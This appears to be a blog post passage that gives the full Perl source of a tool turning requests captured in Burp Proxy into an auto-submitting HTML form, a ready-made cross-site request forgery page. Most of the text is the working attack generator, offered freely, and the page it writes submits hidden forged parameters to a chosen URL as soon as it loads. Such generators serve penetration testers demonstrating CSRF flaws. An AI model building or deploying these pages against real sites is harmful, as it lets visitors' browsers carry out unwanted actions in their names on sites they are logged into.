Therefore I developed a short Perl script which parses request data into a CSRF request (almost the same).
What you need in order to run the script:
1. Perl (obviously)
2. Burp Proxy - the attacker should intercept the request and then copy all the data to Notepad. The script expects one parameter per line, tab-separated as type, name and value, and uses only the lines whose type is "body".
My script reads the data from the file "d:\csrf.txt"; the path can be changed. The output file has the same name with an "html" extension.
Here is the source code of the script:
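use strict;
use warnings;

# Escape a string for use inside a double-quoted HTML attribute.
sub esc {
    my ($s) = @_;
    $s =~ s/&/&amp;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    return $s;
}

open(my $inf, '<', 'd:\\csrf.txt') or die "error while opening the input file: $!\n";
open(my $outf, '>', 'd:\\csrf.html') or die "error while creating the output file: $!\n";
my @arrin = <$inf>;
close($inf);

print "Script by Nir Valtman\n";
print "Enter the URL: ";
my $q = <STDIN>;
chomp($q);    # drop the trailing newline so it does not end up in the action attribute
my $action = esc($q);

print $outf "<html xmlns=\"http://www.w3.org/1999/xhtml\" >
<head>
<title>CSRF attack</title>
</head>
<body>
<form name=\"badform\" method=\"post\" action=\"$action\"> \n";

foreach my $obj (@arrin)
{
    chomp($obj);
    # Each line is: type <TAB> name <TAB> value; the limit keeps tabs inside the value.
    my ($type, $name, $value) = split(/\t/, $obj, 3);
    next unless defined $type && $type eq "body";
    # Only body parameters become hidden form fields.
    print $outf "<input type=\"hidden\" name=\"" . esc($name // '') . "\" value=\"" . esc($value // '') . "\" />\n";
}

print $outf "<script type=\"text/javascript\">
document.badform.submit();
</script>
</body>
</html>";
close($outf);
print "Done!\n";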
The script is free to use - just give me credit.